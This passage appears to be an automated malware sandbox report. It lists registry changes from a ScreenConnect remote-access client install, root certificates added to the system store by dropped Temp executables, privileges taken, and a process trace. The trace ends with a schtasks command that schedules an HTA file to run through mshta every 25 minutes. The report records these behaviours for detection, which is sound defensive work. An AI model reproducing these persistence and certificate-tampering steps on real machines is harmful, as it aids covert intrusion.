| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" | C:\Windows\system32\msiexec.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Ot24UmakgHQ" /tr "mshta \"C:\Temp\BaWQvGOZI.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\mshta.exe
mshta "C:\Temp\BaWQvGOZI.hta"
